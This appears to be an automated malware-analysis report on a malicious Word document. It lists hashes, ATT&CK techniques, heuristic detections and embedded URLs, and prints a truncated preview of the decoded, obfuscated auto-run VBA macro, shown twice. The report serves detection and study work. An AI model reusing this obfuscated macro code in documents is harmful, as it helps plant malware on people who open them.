Office (OLE) malware analysis — malicious · 5e4b74a279fcf9d1

MALICIOUS

Office (OLE)

125.5 KB Created: 2018-04-12 16:21:00 Authoring application: Microsoft Office Word First seen: 2019-05-31

MD5: 00ba6576e51a64ffc8ffa22cea930119 SHA-1: d780bafea192aa8d6c24a8ac5968c96336e28dcb SHA-256: 5e4b74a279fcf9d13a450390491d1b7b3b91732dc847eee3629f970a05c985f5

222 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a malicious Office document containing obfuscated VBA macros. The AutoOpen macro utilizes CreateObject, a common technique for executing arbitrary code, and the ClamAV heuristic indicates it's a known malicious macro. The script's intent is to execute code, likely downloading a second-stage payload from the embedded URL.

Heuristics 7

ClamAV: Doc.Macro.Obfuscated-6397052-2 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Macro.Obfuscated-6397052-2
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://www.isprambiente.gov.it/files/temi/rischio-industriale/stabilimenti.jpg In document text (OLE body)
- http://ns.adobe.com/xap/1.0/In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 75234 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	75234 bytes
SHA-256: `537f7fcfec6931cb1207cd694efe01b3e94b03b32a1436717ab194fe51ac58a2`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "PFP5Ux" Public Function MEsuBNgYlZiAUmpm(ClOd9LNgfqkymOn As String, Optional obRWBYmdG9wiDh As Boolean = True) As String Static NKEqE36sMC23NX3(0 To 255) As Byte Dim GNe0vqpKSD0MOVns() As Byte, oTnSyP5ksG9CaG() As Byte Dim PAImiUUwc6lCznO As Long, kkXiUGfbFE2U3Hoqmt As Long If NKEqE36sMC23NX3(0) = 0 Then Dim OlDh2kTwjlFsXb As Integer Dim hS47mrkr57s As String OlDh2kTwjlFsXb = 7795 Dim bFiEmKJt5xD As Integer hS47mrkr57s = Right(CStr(OlDh2kTwjlFsXb), 1) bFiEmKJt5xD = CInt(hS47mrkr57s) For EdfYg31Vzxd = bFiEmKJt5xD To 56 OlDh2kTwjlFsXb = OlDh2kTwjlFsXb + 9 Next EdfYg31Vzxd Dim IqxjK2DWSCh20b, IPX9nK3wL44 As String IqxjK2DWSCh20b = 5 IPX9nK3wL44 = 3 #If IqxjK2DWSCh20b > IPX9nK3wL44 Then Dim t0BGqxmyFHE As LongPtr #Else Dim t0BGqxmyFHE As Integer t0BGqxmyFHE = 5 + 3 Dim mF56RIbpaiF As Integer For mF56RIbpaiF = 0 To IqxjK2DWSCh20b mF56RIbpaiF = mF56RIbpaiF + 1 Next mF56RIbpaiF #End If For PAImiUUwc6lCznO = 0 To 255 Dim Z5pSCCQlN4EvTG As Object NKEqE36sMC23NX3(PAImiUUwc6lCznO) = 255 Next PAImiUUwc6lCznO Dim jtqiJXbz63RuTn As String jtqiJXbz63RuTn = Application.UserName Dim jkwNi4Ia2og, jFEyq3h4P0BCZ9 As Integer jFEyq3h4P0BCZ9 = Len(jtqiJXbz63RuTn) Dim mYViEs6oEcN As Collection While jFEyq3h4P0BCZ9 > 2 jkwNi4Ia2og = jkwNi4Ia2og + 4 jFEyq3h4P0BCZ9 = jFEyq3h4P0BCZ9 - 6 Wend Dim HflHLKXHSftRyF As String Dim zNCqbxsF0yIoIi, V5v14GaLeSr As Integer zNCqbxsF0yIoIi = 1 V5v14GaLeSr = 9 #If THqJrLyRDyb <> 0 Then THqJrLyRDyb = THqJrLyRDyb + 2 Dim uOoG2IS9vaD As Variant Else Dim uOoG2IS9vaD As Object #End If If zNCqbxsF0yIoIi > V5v14GaLeSr Then For sHWxJTJCztu8Es = V5v14GaLeSr To zNCqbxsF0yIoIi V5v14GaLeSr = V5v14GaLeSr / zNCqbxsF0yIoIi Next sHWxJTJCztu8Es End If For PAImiUUwc6lCznO = 0 To 25 Dim QQiw1BeIBBsIPk As Integer NKEqE36sMC23NX3(PAImiUUwc6lCznO + 65) = PAImiUUwc6lCznO Next PAImiUUwc6lCznO For PAImiUUwc6lCznO = 26 To 51 Dim r6UJlVMqZ1upsQ As String Dim ihP2WkPLSMA As String ihP2WkPLSMA = jwE4WBts8U0 r6UJlVMqZ1upsQ = Z9OyOlItt7j If (StrComp(r6UJlVMqZ1upsQ, ihP2WkPLSMA, vbTextCompare) <> 0) Then MsgBox ("Optional: TBlwrMD5noIJ5j.") End If NKEqE36sMC23NX3(PAImiUUwc6lCznO + 71) = PAImiUUwc6lCznO Dim rF3sAxbMihDorS As Integer For OrOnqZWSPz8 = 7 To 77 rF3sAxbMihDorS = OrOnqZWSPz8 Next OrOnqZWSPz8 Next PAImiUUwc6lCznO Dim fXOtHNi1IqVbfm As Object Dim NHauWe7yhoGwro As String NHauWe7yhoGwro = Application.UserName Dim sR94XdsLK32, WKjd4tsWE7h2W0 As Integer WKjd4tsWE7h2W0 = Len(NHauWe7yhoGwro) Dim AnPCavYTJNj As Collection While WKjd4tsWE7h2W0 > 2 sR94XdsLK32 = sR94XdsLK32 + 6 WKjd4tsWE7h2W0 = WKjd4tsWE7h2W0 - 7 Wend For PAImiUUwc6lCznO = 52 To 61 Dim fuCHkDnLL3jP5j, NmVmYa2bzWg As Integer fuCHkDnLL3jP5j = 5 NmVmYa2bzWg = 5 #If nTItNWVgOav <> 0 Then nTItNWVgOav = nTItNWVgOav + 9 Dim YIhkLcbZkzH As Variant Else Dim YIhkLcbZkzH As Object #End If If fuCHkDnLL3jP5j > NmVmYa2bzWg Then For PfpUkonlK6ql0u = NmVmYa2bzWg To fuCHkDnLL3jP5j NmVmYa2bzWg = NmVmYa2bzWg / fuCHkDnLL3jP5j Next PfpUkonlK6ql0u End If NKEqE36sMC23NX3(PAImiUUwc6lCznO - 4) = PAImiUUwc6lCznO Dim k0qAd3WDaIAgGf, rYLKi42Ns1X As Integer k0qAd3WDaIAgGf = 8 rYLKi42Ns1X = 2 #If Etg0D3pVrX8 <> 0 Then Etg0D3pVrX8 = Etg0D3pVrX8 + 4 Dim dagfYpM3miw As Variant Else Dim dagfYpM3miw As Object #End If If k0qAd3WDaIAgGf > rYLKi42Ns1X Then For N1ecFR2neHymYJ = rYLKi42Ns1X To k0qAd3WDaIAgGf rYLKi42Ns1X = rYLKi42Ns1X / k0qAd3WDaIAgGf Next N1ecFR2neHymYJ End If Next PAImiUUwc6lCznO Dim zoraOWaeSjzGpK As String Dim sva6rVPAF6h As String sva6rVPAF6h = j6wKL8b4Vpr zoraOWaeSjzGpK = uXKGnZiLABq If (StrComp(zoraOWaeSjzGpK, sva6rVPAF6h, vbTextCompare) <> 0) Then MsgBox ("Optional: UjENUqB29jv3iZ.") End If NKEqE36sMC23NX3(43) = 62 Dim fq9FckpxX3ZMKh, ETChpxXi1bN As Integer fq9FckpxX3Z ... (truncated)

SHA-256: 537f7fcfec6931cb1207cd694efe01b3e94b03b32a1436717ab194fe51ac58a2

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "PFP5Ux"
Public Function MEsuBNgYlZiAUmpm(ClOd9LNgfqkymOn As String, Optional obRWBYmdG9wiDh As Boolean = True) As String
Static NKEqE36sMC23NX3(0 To 255) As Byte
Dim GNe0vqpKSD0MOVns() As Byte, oTnSyP5ksG9CaG() As Byte
Dim PAImiUUwc6lCznO As Long, kkXiUGfbFE2U3Hoqmt As Long
If NKEqE36sMC23NX3(0) = 0 Then
Dim OlDh2kTwjlFsXb As Integer
Dim hS47mrkr57s As String
OlDh2kTwjlFsXb = 7795
Dim bFiEmKJt5xD As Integer
hS47mrkr57s = Right(CStr(OlDh2kTwjlFsXb), 1)
bFiEmKJt5xD = CInt(hS47mrkr57s)
For EdfYg31Vzxd = bFiEmKJt5xD To 56
OlDh2kTwjlFsXb = OlDh2kTwjlFsXb + 9
Next EdfYg31Vzxd
Dim IqxjK2DWSCh20b, IPX9nK3wL44 As String
IqxjK2DWSCh20b = 5
IPX9nK3wL44 = 3
#If IqxjK2DWSCh20b > IPX9nK3wL44 Then
Dim t0BGqxmyFHE As LongPtr
#Else
Dim t0BGqxmyFHE As Integer
t0BGqxmyFHE = 5 + 3
Dim mF56RIbpaiF As Integer
For mF56RIbpaiF = 0 To IqxjK2DWSCh20b
mF56RIbpaiF = mF56RIbpaiF + 1
Next mF56RIbpaiF
#End If
For PAImiUUwc6lCznO = 0 To 255
Dim Z5pSCCQlN4EvTG As Object
NKEqE36sMC23NX3(PAImiUUwc6lCznO) = 255
Next PAImiUUwc6lCznO
Dim jtqiJXbz63RuTn As String
jtqiJXbz63RuTn = Application.UserName
Dim jkwNi4Ia2og, jFEyq3h4P0BCZ9 As Integer
jFEyq3h4P0BCZ9 = Len(jtqiJXbz63RuTn)
Dim mYViEs6oEcN As Collection
While jFEyq3h4P0BCZ9 > 2
jkwNi4Ia2og = jkwNi4Ia2og + 4
jFEyq3h4P0BCZ9 = jFEyq3h4P0BCZ9 - 6
Wend
Dim HflHLKXHSftRyF As String
Dim zNCqbxsF0yIoIi, V5v14GaLeSr As Integer
zNCqbxsF0yIoIi = 1
V5v14GaLeSr = 9
#If THqJrLyRDyb <> 0 Then
THqJrLyRDyb = THqJrLyRDyb + 2
Dim uOoG2IS9vaD As Variant
Else
Dim uOoG2IS9vaD As Object
#End If
If zNCqbxsF0yIoIi > V5v14GaLeSr Then
For sHWxJTJCztu8Es = V5v14GaLeSr To zNCqbxsF0yIoIi
V5v14GaLeSr = V5v14GaLeSr / zNCqbxsF0yIoIi
Next sHWxJTJCztu8Es
End If
For PAImiUUwc6lCznO = 0 To 25
Dim QQiw1BeIBBsIPk As Integer
NKEqE36sMC23NX3(PAImiUUwc6lCznO + 65) = PAImiUUwc6lCznO
Next PAImiUUwc6lCznO
For PAImiUUwc6lCznO = 26 To 51
Dim r6UJlVMqZ1upsQ As String
Dim ihP2WkPLSMA As String
ihP2WkPLSMA = jwE4WBts8U0
r6UJlVMqZ1upsQ = Z9OyOlItt7j
If (StrComp(r6UJlVMqZ1upsQ, ihP2WkPLSMA, vbTextCompare) <> 0) Then
MsgBox ("Optional: TBlwrMD5noIJ5j.")
End If
NKEqE36sMC23NX3(PAImiUUwc6lCznO + 71) = PAImiUUwc6lCznO
Dim rF3sAxbMihDorS As Integer
For OrOnqZWSPz8 = 7 To 77
rF3sAxbMihDorS = OrOnqZWSPz8
Next OrOnqZWSPz8
Next PAImiUUwc6lCznO
Dim fXOtHNi1IqVbfm As Object
Dim NHauWe7yhoGwro As String
NHauWe7yhoGwro = Application.UserName
Dim sR94XdsLK32, WKjd4tsWE7h2W0 As Integer
WKjd4tsWE7h2W0 = Len(NHauWe7yhoGwro)
Dim AnPCavYTJNj As Collection
While WKjd4tsWE7h2W0 > 2
sR94XdsLK32 = sR94XdsLK32 + 6
WKjd4tsWE7h2W0 = WKjd4tsWE7h2W0 - 7
Wend
For PAImiUUwc6lCznO = 52 To 61
Dim fuCHkDnLL3jP5j, NmVmYa2bzWg As Integer
fuCHkDnLL3jP5j = 5
NmVmYa2bzWg = 5
#If nTItNWVgOav <> 0 Then
nTItNWVgOav = nTItNWVgOav + 9
Dim YIhkLcbZkzH As Variant
Else
Dim YIhkLcbZkzH As Object
#End If
If fuCHkDnLL3jP5j > NmVmYa2bzWg Then
For PfpUkonlK6ql0u = NmVmYa2bzWg To fuCHkDnLL3jP5j
NmVmYa2bzWg = NmVmYa2bzWg / fuCHkDnLL3jP5j
Next PfpUkonlK6ql0u
End If
NKEqE36sMC23NX3(PAImiUUwc6lCznO - 4) = PAImiUUwc6lCznO
Dim k0qAd3WDaIAgGf, rYLKi42Ns1X As Integer
k0qAd3WDaIAgGf = 8
rYLKi42Ns1X = 2
#If Etg0D3pVrX8 <> 0 Then
Etg0D3pVrX8 = Etg0D3pVrX8 + 4
Dim dagfYpM3miw As Variant
Else
Dim dagfYpM3miw As Object
#End If
If k0qAd3WDaIAgGf > rYLKi42Ns1X Then
For N1ecFR2neHymYJ = rYLKi42Ns1X To k0qAd3WDaIAgGf
rYLKi42Ns1X = rYLKi42Ns1X / k0qAd3WDaIAgGf
Next N1ecFR2neHymYJ
End If
Next PAImiUUwc6lCznO
Dim zoraOWaeSjzGpK As String
Dim sva6rVPAF6h As String
sva6rVPAF6h = j6wKL8b4Vpr
zoraOWaeSjzGpK = uXKGnZiLABq
If (StrComp(zoraOWaeSjzGpK, sva6rVPAF6h, vbTextCompare) <> 0) Then
MsgBox ("Optional: UjENUqB29jv3iZ.")
End If
NKEqE36sMC23NX3(43) = 62
Dim fq9FckpxX3ZMKh, ETChpxXi1bN As Integer
fq9FckpxX3Z
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.